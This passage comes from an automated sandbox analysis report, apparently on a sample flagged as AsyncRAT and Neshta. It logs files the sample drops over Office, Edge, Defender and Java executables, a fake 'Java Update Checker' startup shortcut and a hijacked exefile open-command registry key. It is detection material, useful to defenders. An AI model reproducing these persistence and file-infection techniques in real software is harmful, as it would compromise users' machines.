                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\mpextms.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\NisSrv.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDlpCmd.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile created: C:\ProgramData\Java Update Checker (64 bit).exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile created: C:\ProgramData\Java Update Checker (64 bit).exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDefenderCoreService.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\mpextms.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\NisSrv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\X86\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCopyAccelerator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\ConfigSecurityPolicy.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDlpCmd.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Windows\svchost.comJump to dropped file

                              Boot Survival

                              barindex
                              Yara detected AsyncRAT
                              Source: Yara matchFile source: x.exe, type: SAMPLE
                              Source: Yara matchFile source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 5336, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED
                              Yara detected Neshta
                              Source: Yara matchFile source: 00000000.00000002.1905892392.0000000000409000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 1292, type: MEMORYSTR
                              Creates an undocumented autostart registry key
                              Source: C:\Users\user\Desktop\x.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULLJump to behavior
                              Source: C:\Users\user\Desktop\x.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULLJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnkJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnkJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Loading BitLocker PowerShell Module
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
